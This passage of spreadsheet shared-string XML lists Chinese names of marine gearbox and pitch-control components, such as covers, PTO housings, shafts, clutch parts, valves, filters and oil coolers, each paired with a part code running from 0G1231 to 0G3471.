  <si>
    <t xml:space="preserve">侧盖-前端                                             </t>
  </si>
  <si>
    <t>0G1231</t>
  </si>
  <si>
    <t xml:space="preserve">侧盖-后端                                             </t>
  </si>
  <si>
    <t>0G1232</t>
  </si>
  <si>
    <t xml:space="preserve">带管侧盖                                              </t>
  </si>
  <si>
    <t>0G1234</t>
  </si>
  <si>
    <t xml:space="preserve">侧盖-PTO                                            </t>
  </si>
  <si>
    <t>0G1238</t>
  </si>
  <si>
    <t xml:space="preserve">铸造侧盖-PTO                                          </t>
  </si>
  <si>
    <t>0G1239</t>
  </si>
  <si>
    <t xml:space="preserve">顶盖                                                </t>
  </si>
  <si>
    <t>0G1240</t>
  </si>
  <si>
    <t xml:space="preserve">PTO顶盖                                             </t>
  </si>
  <si>
    <t>0G1248</t>
  </si>
  <si>
    <t xml:space="preserve">圆盖                                                </t>
  </si>
  <si>
    <t>0G1260</t>
  </si>
  <si>
    <t xml:space="preserve">盲盖                                                </t>
  </si>
  <si>
    <t>0G1262</t>
  </si>
  <si>
    <t xml:space="preserve">保护盖                                               </t>
  </si>
  <si>
    <t>0G1264</t>
  </si>
  <si>
    <t xml:space="preserve">卸去输入轴保护环盖                                         </t>
  </si>
  <si>
    <t>0G1267</t>
  </si>
  <si>
    <t xml:space="preserve">卸去PTO保护环盖                                         </t>
  </si>
  <si>
    <t>0G1268</t>
  </si>
  <si>
    <t xml:space="preserve">预加工盖                                              </t>
  </si>
  <si>
    <t>0G1280</t>
  </si>
  <si>
    <t xml:space="preserve">铸造盖                                               </t>
  </si>
  <si>
    <t>0G1282</t>
  </si>
  <si>
    <t xml:space="preserve">盖垫片                                               </t>
  </si>
  <si>
    <t>0G1290</t>
  </si>
  <si>
    <t xml:space="preserve">安装油泵外壳                                            </t>
  </si>
  <si>
    <t>0G1300</t>
  </si>
  <si>
    <t xml:space="preserve">油泵外壳总成                                            </t>
  </si>
  <si>
    <t>0G1301</t>
  </si>
  <si>
    <t xml:space="preserve">油泵外壳                                              </t>
  </si>
  <si>
    <t>0G1302</t>
  </si>
  <si>
    <t xml:space="preserve">油泵外壳上部                                            </t>
  </si>
  <si>
    <t>0G1310</t>
  </si>
  <si>
    <t xml:space="preserve">油泵外壳下部                                            </t>
  </si>
  <si>
    <t>0G1313</t>
  </si>
  <si>
    <t xml:space="preserve">油泵外壳输出端部件                                         </t>
  </si>
  <si>
    <t>0G1316</t>
  </si>
  <si>
    <t xml:space="preserve">PTO壳体安装                                           </t>
  </si>
  <si>
    <t>0G1330</t>
  </si>
  <si>
    <t xml:space="preserve">PTO壳体总成                                           </t>
  </si>
  <si>
    <t>0G1331</t>
  </si>
  <si>
    <t xml:space="preserve">PTO壳体                                             </t>
  </si>
  <si>
    <t>0G1332</t>
  </si>
  <si>
    <t xml:space="preserve">PTO壳体上部                                           </t>
  </si>
  <si>
    <t>0G1340</t>
  </si>
  <si>
    <t xml:space="preserve">PTO壳体中部                                           </t>
  </si>
  <si>
    <t>0G1343</t>
  </si>
  <si>
    <t xml:space="preserve">PTO壳体下部                                           </t>
  </si>
  <si>
    <t>0G1346</t>
  </si>
  <si>
    <t xml:space="preserve">PTO轴承盖-前端                                         </t>
  </si>
  <si>
    <t>0G1350</t>
  </si>
  <si>
    <t xml:space="preserve">PTO轴承盖-后端                                         </t>
  </si>
  <si>
    <t>0G1352</t>
  </si>
  <si>
    <t xml:space="preserve">输入轴总成                                             </t>
  </si>
  <si>
    <t>0G2000</t>
  </si>
  <si>
    <t xml:space="preserve">输入轴                                               </t>
  </si>
  <si>
    <t>0G2001</t>
  </si>
  <si>
    <t xml:space="preserve">预加工输入轴                                            </t>
  </si>
  <si>
    <t>0G2002</t>
  </si>
  <si>
    <t xml:space="preserve">离合器轴                                              </t>
  </si>
  <si>
    <t>0G2004</t>
  </si>
  <si>
    <t xml:space="preserve">预加工离合器                                            </t>
  </si>
  <si>
    <t>0G2005</t>
  </si>
  <si>
    <t xml:space="preserve">输出轴总成                                             </t>
  </si>
  <si>
    <t>0G2020</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴总成                                             </t>
  </si>
  <si>
    <t>0G2021</t>
  </si>
  <si>
    <t>0G2022</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴加工前                                            </t>
  </si>
  <si>
    <t>0G2023</t>
  </si>
  <si>
    <t xml:space="preserve">支撑轴总成                                             </t>
  </si>
  <si>
    <t>0G2025</t>
  </si>
  <si>
    <t xml:space="preserve">支撑轴                                               </t>
  </si>
  <si>
    <t>0G2026</t>
  </si>
  <si>
    <t xml:space="preserve">支撑轴加工前                                            </t>
  </si>
  <si>
    <t>0G2027</t>
  </si>
  <si>
    <t xml:space="preserve">PTO轴总成-控制                                         </t>
  </si>
  <si>
    <t>0G2040</t>
  </si>
  <si>
    <t xml:space="preserve">PTO轴总成                                            </t>
  </si>
  <si>
    <t>0G2041</t>
  </si>
  <si>
    <t xml:space="preserve">带小齿轮PTO轴-控制                                       </t>
  </si>
  <si>
    <t>0G2042</t>
  </si>
  <si>
    <t xml:space="preserve">带小齿轮PTO轴                                          </t>
  </si>
  <si>
    <t>0G2043</t>
  </si>
  <si>
    <t xml:space="preserve">PTO轴-控制                                           </t>
  </si>
  <si>
    <t>0G2044</t>
  </si>
  <si>
    <t xml:space="preserve">PTO轴                                              </t>
  </si>
  <si>
    <t>0G2045</t>
  </si>
  <si>
    <t xml:space="preserve">PTO轴加工前                                           </t>
  </si>
  <si>
    <t>0G2046</t>
  </si>
  <si>
    <t xml:space="preserve">中间轴总成                                             </t>
  </si>
  <si>
    <t>0G2060</t>
  </si>
  <si>
    <t xml:space="preserve">中间轴                                               </t>
  </si>
  <si>
    <t>0G2061</t>
  </si>
  <si>
    <t xml:space="preserve">中间轴加工前                                            </t>
  </si>
  <si>
    <t>0G2062</t>
  </si>
  <si>
    <t xml:space="preserve">输入轴毂                                              </t>
  </si>
  <si>
    <t>0G2080</t>
  </si>
  <si>
    <t xml:space="preserve">输入轴加工前毂                                           </t>
  </si>
  <si>
    <t>0G2081</t>
  </si>
  <si>
    <t xml:space="preserve">PTO毂                                              </t>
  </si>
  <si>
    <t>0G2082</t>
  </si>
  <si>
    <t xml:space="preserve">PTO加工前毂                                           </t>
  </si>
  <si>
    <t>0G2083</t>
  </si>
  <si>
    <t xml:space="preserve">小齿轮                                               </t>
  </si>
  <si>
    <t>0G2100</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮                                                </t>
  </si>
  <si>
    <t>0G2105</t>
  </si>
  <si>
    <t xml:space="preserve">油防护装置安装                                           </t>
  </si>
  <si>
    <t>0G2107</t>
  </si>
  <si>
    <t xml:space="preserve">油防护总成                                             </t>
  </si>
  <si>
    <t>0G2108</t>
  </si>
  <si>
    <t xml:space="preserve">油防护板                                              </t>
  </si>
  <si>
    <t>0G2109</t>
  </si>
  <si>
    <t xml:space="preserve">PTO小齿轮                                            </t>
  </si>
  <si>
    <t>0G2120</t>
  </si>
  <si>
    <t xml:space="preserve">PTO前端小齿轮                                          </t>
  </si>
  <si>
    <t>0G2121</t>
  </si>
  <si>
    <t xml:space="preserve">PTO中心小齿轮                                          </t>
  </si>
  <si>
    <t>0G2122</t>
  </si>
  <si>
    <t xml:space="preserve">PTO偏移小齿轮                                          </t>
  </si>
  <si>
    <t>0G2123</t>
  </si>
  <si>
    <t xml:space="preserve">PTO齿轮                                             </t>
  </si>
  <si>
    <t>0G2125</t>
  </si>
  <si>
    <t xml:space="preserve">中间PTO齿轮                                           </t>
  </si>
  <si>
    <t>0G2126</t>
  </si>
  <si>
    <t xml:space="preserve">偏置PTO齿轮                                           </t>
  </si>
  <si>
    <t>0G2127</t>
  </si>
  <si>
    <t xml:space="preserve">泵小齿轮                                              </t>
  </si>
  <si>
    <t>0G2140</t>
  </si>
  <si>
    <t xml:space="preserve">泵驱动齿轮                                             </t>
  </si>
  <si>
    <t>0G2145</t>
  </si>
  <si>
    <t xml:space="preserve">键槽-内部啮合                                           </t>
  </si>
  <si>
    <t>0G2160</t>
  </si>
  <si>
    <t xml:space="preserve">键槽-外部啮合                                           </t>
  </si>
  <si>
    <t>0G2165</t>
  </si>
  <si>
    <t xml:space="preserve">齿形参数-小齿轮/齿轮                                       </t>
  </si>
  <si>
    <t>0G2180</t>
  </si>
  <si>
    <t xml:space="preserve">齿形参数-PTO                                          </t>
  </si>
  <si>
    <t>0G2181</t>
  </si>
  <si>
    <t xml:space="preserve">齿形参数-泵                                            </t>
  </si>
  <si>
    <t>0G2182</t>
  </si>
  <si>
    <t xml:space="preserve">离合器毂                                              </t>
  </si>
  <si>
    <t>0G2200</t>
  </si>
  <si>
    <t xml:space="preserve">离合器锥套管                                            </t>
  </si>
  <si>
    <t>0G2203</t>
  </si>
  <si>
    <t xml:space="preserve">离合器外壳                                             </t>
  </si>
  <si>
    <t>0G2206</t>
  </si>
  <si>
    <t xml:space="preserve">离合器活塞                                             </t>
  </si>
  <si>
    <t>0G2210</t>
  </si>
  <si>
    <t xml:space="preserve">气缸离合器                                             </t>
  </si>
  <si>
    <t>0G2213</t>
  </si>
  <si>
    <t xml:space="preserve">预加工离合器缸                                           </t>
  </si>
  <si>
    <t>0G2214</t>
  </si>
  <si>
    <t xml:space="preserve">分离环                                               </t>
  </si>
  <si>
    <t>0G2217</t>
  </si>
  <si>
    <t xml:space="preserve">预加工分离环                                            </t>
  </si>
  <si>
    <t>0G2218</t>
  </si>
  <si>
    <t xml:space="preserve">离合器圆盘                                             </t>
  </si>
  <si>
    <t>0G2220</t>
  </si>
  <si>
    <t xml:space="preserve">离合器圆盘加工                                           </t>
  </si>
  <si>
    <t>0G2221</t>
  </si>
  <si>
    <t xml:space="preserve">离合器制动环                                            </t>
  </si>
  <si>
    <t>0G2230</t>
  </si>
  <si>
    <t xml:space="preserve">离合器制动板                                            </t>
  </si>
  <si>
    <t>0G2232</t>
  </si>
  <si>
    <t xml:space="preserve">离合器定位销                                            </t>
  </si>
  <si>
    <t>0G2234</t>
  </si>
  <si>
    <t xml:space="preserve">离合器板-内齿                                           </t>
  </si>
  <si>
    <t>0G2250</t>
  </si>
  <si>
    <t xml:space="preserve">离合器板-外齿                                           </t>
  </si>
  <si>
    <t>0G2251</t>
  </si>
  <si>
    <t xml:space="preserve">伺服活塞总成                                            </t>
  </si>
  <si>
    <t>0G2300</t>
  </si>
  <si>
    <t xml:space="preserve">伺服活塞                                              </t>
  </si>
  <si>
    <t>0G2301</t>
  </si>
  <si>
    <t xml:space="preserve">预加工伺服活塞                                           </t>
  </si>
  <si>
    <t>0G2302</t>
  </si>
  <si>
    <t xml:space="preserve">伺服气缸                                              </t>
  </si>
  <si>
    <t>0G2305</t>
  </si>
  <si>
    <t xml:space="preserve">预加工伺服气缸                                           </t>
  </si>
  <si>
    <t>0G2306</t>
  </si>
  <si>
    <t xml:space="preserve">伺服活塞法兰                                            </t>
  </si>
  <si>
    <t>0G2320</t>
  </si>
  <si>
    <t xml:space="preserve">活塞加工前法兰                                           </t>
  </si>
  <si>
    <t>0G2321</t>
  </si>
  <si>
    <t xml:space="preserve">伺服活塞定位销                                           </t>
  </si>
  <si>
    <t>0G2323</t>
  </si>
  <si>
    <t xml:space="preserve">伺服活塞加轴套                                           </t>
  </si>
  <si>
    <t>0G2325</t>
  </si>
  <si>
    <t xml:space="preserve">伺服油管总成                                            </t>
  </si>
  <si>
    <t>0G2340</t>
  </si>
  <si>
    <t xml:space="preserve">伺服油管                                              </t>
  </si>
  <si>
    <t>0G2341</t>
  </si>
  <si>
    <t xml:space="preserve">伺服油管塞子                                            </t>
  </si>
  <si>
    <t>0G2343</t>
  </si>
  <si>
    <t xml:space="preserve">伺服油管衬套                                            </t>
  </si>
  <si>
    <t>0G2345</t>
  </si>
  <si>
    <t xml:space="preserve">传感器磁铁                                             </t>
  </si>
  <si>
    <t>0G2348</t>
  </si>
  <si>
    <t xml:space="preserve">传感器定距环                                            </t>
  </si>
  <si>
    <t>0G2349</t>
  </si>
  <si>
    <t xml:space="preserve">衬套-铜                                              </t>
  </si>
  <si>
    <t>0G2400</t>
  </si>
  <si>
    <t xml:space="preserve">衬套-白合金                                            </t>
  </si>
  <si>
    <t>0G2402</t>
  </si>
  <si>
    <t xml:space="preserve">预加工衬套                                             </t>
  </si>
  <si>
    <t>0G2403</t>
  </si>
  <si>
    <t xml:space="preserve">轴向定位支撑物                                           </t>
  </si>
  <si>
    <t>0G2420</t>
  </si>
  <si>
    <t xml:space="preserve">轴向定位-前端                                           </t>
  </si>
  <si>
    <t>0G2422</t>
  </si>
  <si>
    <t xml:space="preserve">轴向定位-后端                                           </t>
  </si>
  <si>
    <t>0G2424</t>
  </si>
  <si>
    <t xml:space="preserve">甩油环安装                                             </t>
  </si>
  <si>
    <t>0G2430</t>
  </si>
  <si>
    <t xml:space="preserve">甩油环                                               </t>
  </si>
  <si>
    <t>0G2432</t>
  </si>
  <si>
    <t xml:space="preserve">轴上刮环                                              </t>
  </si>
  <si>
    <t>0G2434</t>
  </si>
  <si>
    <t xml:space="preserve">定距环                                               </t>
  </si>
  <si>
    <t>0G2436</t>
  </si>
  <si>
    <t xml:space="preserve">推力轴密封法兰                                           </t>
  </si>
  <si>
    <t>0G2440</t>
  </si>
  <si>
    <t xml:space="preserve">安装好的轴刹车系统                                         </t>
  </si>
  <si>
    <t>0G2500</t>
  </si>
  <si>
    <t xml:space="preserve">轴刹车系统总成                                           </t>
  </si>
  <si>
    <t>0G2502</t>
  </si>
  <si>
    <t xml:space="preserve">轴刹车                                               </t>
  </si>
  <si>
    <t>0G2510</t>
  </si>
  <si>
    <t xml:space="preserve">制动块                                               </t>
  </si>
  <si>
    <t>0G2515</t>
  </si>
  <si>
    <t xml:space="preserve">制动盘                                               </t>
  </si>
  <si>
    <t>0G2520</t>
  </si>
  <si>
    <t xml:space="preserve">轴制动器总成支架                                          </t>
  </si>
  <si>
    <t>0G2530</t>
  </si>
  <si>
    <t xml:space="preserve">支架板-轴刹车                                           </t>
  </si>
  <si>
    <t>0G2532</t>
  </si>
  <si>
    <t xml:space="preserve">支撑支架-轴刹车                                          </t>
  </si>
  <si>
    <t>0G2533</t>
  </si>
  <si>
    <t xml:space="preserve">支架定距块                                             </t>
  </si>
  <si>
    <t>0G2535</t>
  </si>
  <si>
    <t xml:space="preserve">阀组件安装                                             </t>
  </si>
  <si>
    <t>0G3000</t>
  </si>
  <si>
    <t xml:space="preserve">阀组件总成                                             </t>
  </si>
  <si>
    <t>0G3001</t>
  </si>
  <si>
    <t xml:space="preserve">阀组件油堵                                             </t>
  </si>
  <si>
    <t>0G3003</t>
  </si>
  <si>
    <t xml:space="preserve">油堵-阀组件加工前                                         </t>
  </si>
  <si>
    <t>0G3004</t>
  </si>
  <si>
    <t xml:space="preserve">油堵-阀组件                                            </t>
  </si>
  <si>
    <t>0G3005</t>
  </si>
  <si>
    <t xml:space="preserve">油堵-中间的                                            </t>
  </si>
  <si>
    <t>0G3007</t>
  </si>
  <si>
    <t xml:space="preserve">伺服油压滑动                                            </t>
  </si>
  <si>
    <t>0G3020</t>
  </si>
  <si>
    <t xml:space="preserve">伺服油压衬套                                            </t>
  </si>
  <si>
    <t>0G3021</t>
  </si>
  <si>
    <t xml:space="preserve">离合器油压滑动                                           </t>
  </si>
  <si>
    <t>0G3022</t>
  </si>
  <si>
    <t xml:space="preserve">离合器油压衬套                                           </t>
  </si>
  <si>
    <t>0G3023</t>
  </si>
  <si>
    <t xml:space="preserve">阀组件锥形阀                                            </t>
  </si>
  <si>
    <t>0G3024</t>
  </si>
  <si>
    <t xml:space="preserve">滑动弹簧                                              </t>
  </si>
  <si>
    <t>0G3026</t>
  </si>
  <si>
    <t xml:space="preserve">弹簧帽                                               </t>
  </si>
  <si>
    <t>0G3027</t>
  </si>
  <si>
    <t xml:space="preserve">弹簧帽法兰                                             </t>
  </si>
  <si>
    <t>0G3028</t>
  </si>
  <si>
    <t xml:space="preserve">压力垫圈                                              </t>
  </si>
  <si>
    <t>0G3029</t>
  </si>
  <si>
    <t xml:space="preserve">安全阀组件安装                                           </t>
  </si>
  <si>
    <t>0G3040</t>
  </si>
  <si>
    <t xml:space="preserve">安全阀组件总成                                           </t>
  </si>
  <si>
    <t>0G3041</t>
  </si>
  <si>
    <t xml:space="preserve">安全阀油堵                                             </t>
  </si>
  <si>
    <t>0G3043</t>
  </si>
  <si>
    <t xml:space="preserve">油堵-安全阀预加工                                         </t>
  </si>
  <si>
    <t>0G3044</t>
  </si>
  <si>
    <t xml:space="preserve">油堵-铸造安全阀                                          </t>
  </si>
  <si>
    <t>0G3045</t>
  </si>
  <si>
    <t xml:space="preserve">比例阀安装                                             </t>
  </si>
  <si>
    <t>0G3060</t>
  </si>
  <si>
    <t xml:space="preserve">比例阀-总成                                            </t>
  </si>
  <si>
    <t>0G3062</t>
  </si>
  <si>
    <t xml:space="preserve">先导阀-总成                                            </t>
  </si>
  <si>
    <t>0G3064</t>
  </si>
  <si>
    <t xml:space="preserve">先导阀线圈                                             </t>
  </si>
  <si>
    <t>0G3066</t>
  </si>
  <si>
    <t xml:space="preserve">先导阀连接器                                            </t>
  </si>
  <si>
    <t>0G3067</t>
  </si>
  <si>
    <t xml:space="preserve">先导阀保护帽                                            </t>
  </si>
  <si>
    <t>0G3068</t>
  </si>
  <si>
    <t xml:space="preserve">先导阀滤器                                             </t>
  </si>
  <si>
    <t>0G3069</t>
  </si>
  <si>
    <t xml:space="preserve">电磁阀安装                                             </t>
  </si>
  <si>
    <t>0G3080</t>
  </si>
  <si>
    <t xml:space="preserve">降流量电磁阀                                            </t>
  </si>
  <si>
    <t>0G3081</t>
  </si>
  <si>
    <t xml:space="preserve">降压电磁阀                                             </t>
  </si>
  <si>
    <t>0G3082</t>
  </si>
  <si>
    <t xml:space="preserve">电磁阀总成                                             </t>
  </si>
  <si>
    <t>0G3084</t>
  </si>
  <si>
    <t xml:space="preserve">电磁阀线圈                                             </t>
  </si>
  <si>
    <t>0G3086</t>
  </si>
  <si>
    <t xml:space="preserve">电磁阀连接器                                            </t>
  </si>
  <si>
    <t>0G3087</t>
  </si>
  <si>
    <t xml:space="preserve">电磁阀按钮                                             </t>
  </si>
  <si>
    <t>0G3088</t>
  </si>
  <si>
    <t xml:space="preserve">减压阀                                               </t>
  </si>
  <si>
    <t>0G3100</t>
  </si>
  <si>
    <t xml:space="preserve">减压阀阀壳                                             </t>
  </si>
  <si>
    <t>0G3101</t>
  </si>
  <si>
    <t xml:space="preserve">减压阀-夹层                                            </t>
  </si>
  <si>
    <t>0G3102</t>
  </si>
  <si>
    <t xml:space="preserve">压力释放阀                                             </t>
  </si>
  <si>
    <t>0G3105</t>
  </si>
  <si>
    <t xml:space="preserve">压力释放阀阀体                                           </t>
  </si>
  <si>
    <t>0G3106</t>
  </si>
  <si>
    <t xml:space="preserve">压力释放阀-夹层                                          </t>
  </si>
  <si>
    <t>0G3107</t>
  </si>
  <si>
    <t xml:space="preserve">减流阀                                               </t>
  </si>
  <si>
    <t>0G3120</t>
  </si>
  <si>
    <t xml:space="preserve">减流阀--夹层                                           </t>
  </si>
  <si>
    <t>0G3121</t>
  </si>
  <si>
    <t xml:space="preserve">止回阀                                               </t>
  </si>
  <si>
    <t>0G3125</t>
  </si>
  <si>
    <t xml:space="preserve">背压阀安装                                             </t>
  </si>
  <si>
    <t>0G3140</t>
  </si>
  <si>
    <t xml:space="preserve">背压阀总成                                             </t>
  </si>
  <si>
    <t>0G3141</t>
  </si>
  <si>
    <t xml:space="preserve">背压阀阻块                                             </t>
  </si>
  <si>
    <t>0G3143</t>
  </si>
  <si>
    <t xml:space="preserve">背压阀滑块                                             </t>
  </si>
  <si>
    <t>0G3145</t>
  </si>
  <si>
    <t xml:space="preserve">预滤器                                               </t>
  </si>
  <si>
    <t>0G3200</t>
  </si>
  <si>
    <t xml:space="preserve">法兰预滤器                                             </t>
  </si>
  <si>
    <t>0G3201</t>
  </si>
  <si>
    <t xml:space="preserve">磁预滤器                                              </t>
  </si>
  <si>
    <t>0G3203</t>
  </si>
  <si>
    <t xml:space="preserve">带法兰磁预滤器                                           </t>
  </si>
  <si>
    <t>0G3204</t>
  </si>
  <si>
    <t xml:space="preserve">放气过滤器                                             </t>
  </si>
  <si>
    <t>0G3206</t>
  </si>
  <si>
    <t xml:space="preserve">预滤器组件                                             </t>
  </si>
  <si>
    <t>0G3210</t>
  </si>
  <si>
    <t xml:space="preserve">预滤器支架                                             </t>
  </si>
  <si>
    <t>0G3211</t>
  </si>
  <si>
    <t xml:space="preserve">顶盖-预滤器                                            </t>
  </si>
  <si>
    <t>0G3213</t>
  </si>
  <si>
    <t xml:space="preserve">预滤器体                                              </t>
  </si>
  <si>
    <t>0G3214</t>
  </si>
  <si>
    <t xml:space="preserve">弹簧-预滤器                                            </t>
  </si>
  <si>
    <t>0G3215</t>
  </si>
  <si>
    <t xml:space="preserve">导杆-预滤器                                            </t>
  </si>
  <si>
    <t>0G3216</t>
  </si>
  <si>
    <t xml:space="preserve">磁杆-预滤器                                            </t>
  </si>
  <si>
    <t>0G3217</t>
  </si>
  <si>
    <t xml:space="preserve">滤器垫片                                              </t>
  </si>
  <si>
    <t>0G3218</t>
  </si>
  <si>
    <t xml:space="preserve">过滤器垫片                                             </t>
  </si>
  <si>
    <t>0G3219</t>
  </si>
  <si>
    <t xml:space="preserve">高压滤器-安装                                           </t>
  </si>
  <si>
    <t>0G3230</t>
  </si>
  <si>
    <t xml:space="preserve">高压滤器                                              </t>
  </si>
  <si>
    <t>0G3231</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油滤器-安装                                          </t>
  </si>
  <si>
    <t>0G3233</t>
  </si>
  <si>
    <t>0G3234</t>
  </si>
  <si>
    <t xml:space="preserve">高压滤器元件                                            </t>
  </si>
  <si>
    <t>0G3240</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油滤器元件                                           </t>
  </si>
  <si>
    <t>0G3241</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油滤器框                                            </t>
  </si>
  <si>
    <t>0G3242</t>
  </si>
  <si>
    <t xml:space="preserve">过滤放泄螺栓                                            </t>
  </si>
  <si>
    <t>0G3244</t>
  </si>
  <si>
    <t xml:space="preserve">放气螺钉垫片                                            </t>
  </si>
  <si>
    <t>0G3245</t>
  </si>
  <si>
    <t xml:space="preserve">滤器支架说明指南                                          </t>
  </si>
  <si>
    <t>0G3246</t>
  </si>
  <si>
    <t xml:space="preserve">滤器导板                                              </t>
  </si>
  <si>
    <t>0G3247</t>
  </si>
  <si>
    <t xml:space="preserve">过滤器垫片组                                            </t>
  </si>
  <si>
    <t>0G3249</t>
  </si>
  <si>
    <t xml:space="preserve">废油盘-安装                                            </t>
  </si>
  <si>
    <t>0G3250</t>
  </si>
  <si>
    <t xml:space="preserve">废油盘                                               </t>
  </si>
  <si>
    <t>0G3251</t>
  </si>
  <si>
    <t xml:space="preserve">废油盘板                                              </t>
  </si>
  <si>
    <t>0G3252</t>
  </si>
  <si>
    <t xml:space="preserve">过滤器支架                                             </t>
  </si>
  <si>
    <t>0G3254</t>
  </si>
  <si>
    <t xml:space="preserve">支板-滤器                                             </t>
  </si>
  <si>
    <t>0G3255</t>
  </si>
  <si>
    <t xml:space="preserve">支撑架                                               </t>
  </si>
  <si>
    <t>0G3256</t>
  </si>
  <si>
    <t xml:space="preserve">支撑板                                               </t>
  </si>
  <si>
    <t>0G3257</t>
  </si>
  <si>
    <t xml:space="preserve">油泵安装                                              </t>
  </si>
  <si>
    <t>0G3300</t>
  </si>
  <si>
    <t xml:space="preserve">带小齿轮油泵                                            </t>
  </si>
  <si>
    <t>0G3301</t>
  </si>
  <si>
    <t xml:space="preserve">油泵                                                </t>
  </si>
  <si>
    <t>0G3302</t>
  </si>
  <si>
    <t xml:space="preserve">油泵密封套                                             </t>
  </si>
  <si>
    <t>0G3304</t>
  </si>
  <si>
    <t xml:space="preserve">油泵带沟球轴承                                           </t>
  </si>
  <si>
    <t>0G3305</t>
  </si>
  <si>
    <t xml:space="preserve">油泵键槽                                              </t>
  </si>
  <si>
    <t>0G3310</t>
  </si>
  <si>
    <t xml:space="preserve">油泵法兰                                              </t>
  </si>
  <si>
    <t>0G3312</t>
  </si>
  <si>
    <t xml:space="preserve">油泵管接头法兰                                           </t>
  </si>
  <si>
    <t>0G3314</t>
  </si>
  <si>
    <t xml:space="preserve">油冷却器安装                                            </t>
  </si>
  <si>
    <t>0G3330</t>
  </si>
  <si>
    <t xml:space="preserve">油冷却器总成                                            </t>
  </si>
  <si>
    <t>0G3331</t>
  </si>
  <si>
    <t xml:space="preserve">油冷却器                                              </t>
  </si>
  <si>
    <t>0G3332</t>
  </si>
  <si>
    <t xml:space="preserve">油冷器法兰                                             </t>
  </si>
  <si>
    <t>0G3334</t>
  </si>
  <si>
    <t xml:space="preserve">油冷却器支架                                            </t>
  </si>
  <si>
    <t>0G3335</t>
  </si>
  <si>
    <t xml:space="preserve">支板-油冷却器                                           </t>
  </si>
  <si>
    <t>0G3336</t>
  </si>
  <si>
    <t xml:space="preserve">油冷却器端盖                                            </t>
  </si>
  <si>
    <t>0G3338</t>
  </si>
  <si>
    <t xml:space="preserve">铸造的油冷却器端盖                                         </t>
  </si>
  <si>
    <t>0G3339</t>
  </si>
  <si>
    <t xml:space="preserve">油冷却器部件                                            </t>
  </si>
  <si>
    <t>0G3340</t>
  </si>
  <si>
    <t xml:space="preserve">压力板-油冷却器                                          </t>
  </si>
  <si>
    <t>0G3342</t>
  </si>
  <si>
    <t xml:space="preserve">油冷却器导流板                                           </t>
  </si>
  <si>
    <t>0G3343</t>
  </si>
  <si>
    <t xml:space="preserve">导流板垫片                                             </t>
  </si>
  <si>
    <t>0G3344</t>
  </si>
  <si>
    <t xml:space="preserve">油冷器垫片                                             </t>
  </si>
  <si>
    <t>0G3345</t>
  </si>
  <si>
    <t xml:space="preserve">油冷却器定距块                                           </t>
  </si>
  <si>
    <t>0G3346</t>
  </si>
  <si>
    <t xml:space="preserve">定位销-油冷却器                                          </t>
  </si>
  <si>
    <t>0G3347</t>
  </si>
  <si>
    <t xml:space="preserve">蓄压器安装                                             </t>
  </si>
  <si>
    <t>0G3360</t>
  </si>
  <si>
    <t xml:space="preserve">带压力表蓄压器                                           </t>
  </si>
  <si>
    <t>0G3361</t>
  </si>
  <si>
    <t xml:space="preserve">蓄压器                                               </t>
  </si>
  <si>
    <t>0G3362</t>
  </si>
  <si>
    <t xml:space="preserve">蓄压器接头                                             </t>
  </si>
  <si>
    <t>0G3364</t>
  </si>
  <si>
    <t xml:space="preserve">蓄压器支架                                             </t>
  </si>
  <si>
    <t>0G3365</t>
  </si>
  <si>
    <t xml:space="preserve">蓄压器支板                                             </t>
  </si>
  <si>
    <t>0G3366</t>
  </si>
  <si>
    <t xml:space="preserve">桨距控制安装                                            </t>
  </si>
  <si>
    <t>0G3400</t>
  </si>
  <si>
    <t xml:space="preserve">十字头调整                                             </t>
  </si>
  <si>
    <t>0G3409</t>
  </si>
  <si>
    <t xml:space="preserve">桨距控制单元门盖                                          </t>
  </si>
  <si>
    <t>0G3410</t>
  </si>
  <si>
    <t xml:space="preserve">支撑盖-桨距控制                                          </t>
  </si>
  <si>
    <t>0G3411</t>
  </si>
  <si>
    <t xml:space="preserve">十字头销座支架                                           </t>
  </si>
  <si>
    <t>0G3412</t>
  </si>
  <si>
    <t xml:space="preserve">十字头销座                                             </t>
  </si>
  <si>
    <t>0G3413</t>
  </si>
  <si>
    <t xml:space="preserve">十字头机架顶盖                                           </t>
  </si>
  <si>
    <t>0G3414</t>
  </si>
  <si>
    <t xml:space="preserve">执行机构防护                                            </t>
  </si>
  <si>
    <t>0G3417</t>
  </si>
  <si>
    <t xml:space="preserve">手柄杆                                               </t>
  </si>
  <si>
    <t>0G3430</t>
  </si>
  <si>
    <t xml:space="preserve">手柄支座                                              </t>
  </si>
  <si>
    <t>0G3431</t>
  </si>
  <si>
    <t xml:space="preserve">十字头定位销                                            </t>
  </si>
  <si>
    <t>0G3432</t>
  </si>
  <si>
    <t xml:space="preserve">十字头摇臂                                             </t>
  </si>
  <si>
    <t>0G3433</t>
  </si>
  <si>
    <t xml:space="preserve">应急运行轴                                             </t>
  </si>
  <si>
    <t>0G3434</t>
  </si>
  <si>
    <t xml:space="preserve">操作柄垫圈                                             </t>
  </si>
  <si>
    <t>0G3435</t>
  </si>
  <si>
    <t xml:space="preserve">十字头叉                                              </t>
  </si>
  <si>
    <t>0G3436</t>
  </si>
  <si>
    <t xml:space="preserve">执行机构连接                                            </t>
  </si>
  <si>
    <t>0G3438</t>
  </si>
  <si>
    <t xml:space="preserve">执行器定位销                                            </t>
  </si>
  <si>
    <t>0G3439</t>
  </si>
  <si>
    <t xml:space="preserve">连接衬套                                              </t>
  </si>
  <si>
    <t>0G3440</t>
  </si>
  <si>
    <t xml:space="preserve">十字头桨距控制                                           </t>
  </si>
  <si>
    <t>0G3441</t>
  </si>
  <si>
    <t xml:space="preserve">叉形臂-桨距控制                                          </t>
  </si>
  <si>
    <t>0G3450</t>
  </si>
  <si>
    <t xml:space="preserve">叉形臂导板                                             </t>
  </si>
  <si>
    <t>0G3451</t>
  </si>
  <si>
    <t xml:space="preserve">导板支架-叉形臂                                          </t>
  </si>
  <si>
    <t>0G3452</t>
  </si>
  <si>
    <t xml:space="preserve">螺柱螺钉-叉形臂                                          </t>
  </si>
  <si>
    <t>0G3453</t>
  </si>
  <si>
    <t xml:space="preserve">换向衬套架                                             </t>
  </si>
  <si>
    <t>0G3470</t>
  </si>
  <si>
    <t xml:space="preserve">换向衬套架适配器                                          </t>
  </si>
  <si>
    <t>0G3471</t>
  </si>
  <si>
    <t xml:space="preserve">套筒和衬套总成                                           </t>
